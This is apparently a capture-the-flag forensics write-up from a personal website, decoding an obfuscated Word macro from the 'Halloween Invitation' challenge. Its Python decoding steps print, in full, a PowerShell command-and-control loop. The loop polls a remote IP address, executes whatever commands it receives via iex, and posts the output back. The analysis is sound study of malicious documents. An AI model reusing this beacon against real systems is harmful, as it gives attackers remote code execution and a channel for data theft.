siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

Halloween Invitation

Background

An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

Difficulty: Easy

In this challenge, we can download a file:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# unzip forensics_halloween_invitation.zip 
Archive:  forensics_halloween_invitation.zip
  inflating: invitation.docm         
                                                                                                           
┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# file invitation.docm 
invitation.docm: Microsoft Word 2007+

It’s a Microsoft Word file!

Find the flag

Let’s open it! (I’ll use LibreOffice Writer, as I’m in a Linux machine):

Looks like we’re gonna deal with macros!

In LibreOffice Writer, you can view macros by go to “Tools” -> “Macros” -> “Edit Macros”:

That’s a lots of obfuscated strings!

In this last 3 lines of this macro, we can see a powershell command:

Also, I’m so curious about this blob of string:

Let’s throw it to CyberChef:

It’s encoded in hex? Let’s decode that:

To decode this hex strings to ASCII characters, I’ll write a simple python script:

#!/usr/bin/env python3

unhexed = "74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103 65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52 65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77 65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65 122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65 71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81 65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85 103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65 103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65 70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65 65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108 65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69 69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81 65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100 119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66 49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90 81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67 65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71 52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65 74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65 67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85 65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101 65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65 71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89 65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79 119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66 121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65 72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73 65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90 81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65 89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107 65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71 48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98 119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 66 71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65 72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48 65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65 102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103 65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65 72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65 99 103 65 119 65 68 85 65 102 81 65 61"
result = ''

for i in unhexed.split(' '):
	result += ''.join(chr(int(i)))

print(result)

Output:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# python3 hex_decode.py
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=

Oh! This time we see a base64 string, let’s decode it again:

#!/usr/bin/env python3

from base64 import b64decode

unhexed = "74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103 65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52 65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77 65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65 122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65 71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81 65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85 103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65 103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65 70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65 65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108 65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69 69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81 65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100 119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66 49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90 81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67 65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71 52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65 74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65 67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85 65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101 65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65 71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89 65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79 119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66 121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65 72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73 65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90 81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65 89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107 65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71 48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98 119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 66 71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65 72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48 65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65 102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103 65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65 72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65 99 103 65 119 65 68 85 65 102 81 65 61"
result = ''

for i in unhexed.split(' '):
	result += ''.join(chr(int(i)))

after_decode = b64decode(result).decode('utf-8')
print(f'After decode:\n{after_decode}')

Output:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# python3 hex_decode.py
After decode:
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}

We found the flag!

Conclusion

What we’ve learned:

  1. Reverse Engineering Word Macros